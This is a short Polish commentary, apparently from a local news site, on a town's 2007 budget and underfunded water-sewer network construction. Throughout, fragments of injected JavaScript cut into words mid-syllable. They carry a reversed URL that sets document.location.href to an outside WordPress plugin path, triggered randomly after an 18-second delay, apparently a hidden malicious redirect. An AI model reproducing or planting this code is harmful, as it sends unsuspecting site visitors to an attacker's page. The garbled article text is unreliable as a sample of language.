Oceniając plan wydatków na 2007 r. należy pozytywnie ocenić wzrost o 2,2 mln zł (prawie dwukrotny) nakładów na inwestycje, wygospodarowanych z oszczędności w budżecie (nie licząc termoizolacji, która ma być wykonana z kredytu 1,5 mln zł). Zdecytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowanie za małe są jednak nakłady na butoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowę sieci wod.-kan. Na ten cel Spółka otrzymała toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotację jedynie 2,5 mln zł (w 2006 r. – 1,7 mln zł). Z wykonanej przeze mnie analizy celowości wydatków wynika, że istnieją dalsze możliwości oszczędności (ok. 2,3 mln zł) i przeznaczenia ich na butoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowę sieci.
Komisja Budżetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towa RM w lutym 2007 r. opracowała swój projekt oszczędności wydatków w wysokości 2 mln zł z przeznaczeniem na ten sam cel. Niestety oba te opracowania nie zostały wzięte pod uwagę przy opracowaniu ostatniej wersji budżetu z 30.04. 2007 r. Spółka Wod.-Kan. miałaby wówczas toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do dyspozycji ok. 4-4,5 mln zł. A przecież butoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dowa sieci wod.-kan. jest priorytetem nowej władzy. Nie powinno się czekać na pieniądze z Unii z założonymi rękami.
Bądź pierwszą osobą, która zostawi swój komentarz